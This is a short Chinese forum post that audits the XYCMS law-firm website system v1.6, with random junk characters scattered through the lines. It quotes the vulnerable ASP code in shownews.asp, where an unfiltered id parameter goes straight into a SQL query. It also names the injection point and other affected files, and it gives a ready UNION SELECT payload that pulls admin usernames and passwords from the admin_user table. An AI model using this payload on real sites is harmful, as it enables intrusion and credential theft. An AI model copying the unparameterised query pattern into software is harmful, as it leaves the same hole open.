前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似# N0 Y9 M4 i; Q/ ?/ p0 {! q6 D
$ L' B1 }1 g# Z v7 n
淫荡分割线
9 u# G/ j$ Z. Y8 d4 m--------------------------------------------------------
% }, W/ z: H+ x( V0 j # |, u5 N( V# m4 G, w6 j/ G3 z4 x
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)* Y7 Z- k0 u2 w: S' t: @: {% p! S# Q
源码地址:http://down.chinaz.com/soft/29233.htm$ i2 C& @7 G- V/ w9 {3 ]
( C3 ]$ D+ Y' o* v% X5 ^# _漏洞文件:shownews.asp$ Z' B4 z& k6 F$ e; S
漏洞代码:7-13行2 a! k4 j( R2 v& a' x
- h r0 }! a# s' s$ r1 a, d
& }5 P; X, `& Q% d
<% ( V' N! R2 x3 q4 x2 F) `
id=request.QueryString("id")6 v, N& g8 N1 i* |% K( u
7 Q- S* H& S( @: A( wset snews=server.createobject("adodb.recordset")
N: {9 s: ~$ a7 s m* ~3 texec="select * from [news] where id="&id3 ^% Z) u+ M+ s% B
snews.open exec,conn,1,1
! w1 s. K# Q5 _! ?%>' i! F. B# ]( \. w. h
( n- G& R; G. B
' \7 ], \9 a7 l! h; Z! t Y8 k- y( {什么过滤都没有 直造成注入
5 M( \1 N& z0 K- i8 { ; j6 M0 _6 E* a( ?# G
注入点:http://127.0.0.1:99/shownews.asp?id=xx" c# V4 v1 u. b( @6 e+ Q1 G
9 g( `, O! y6 q/ {
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
+ ~9 o5 T" Z) d
6 n1 ~* ~2 \: m1 H6 _- m m
! z6 H! |$ u( ^' p. @! q0 Gexp: union select 1,admin,password,4,5,7 from admin_user( T+ M( ~; s' f8 v' g
s- `4 ?/ [2 }% K. r) h9 Q
|
发表于 2013-4-4 17:28:12
收藏
支持
反对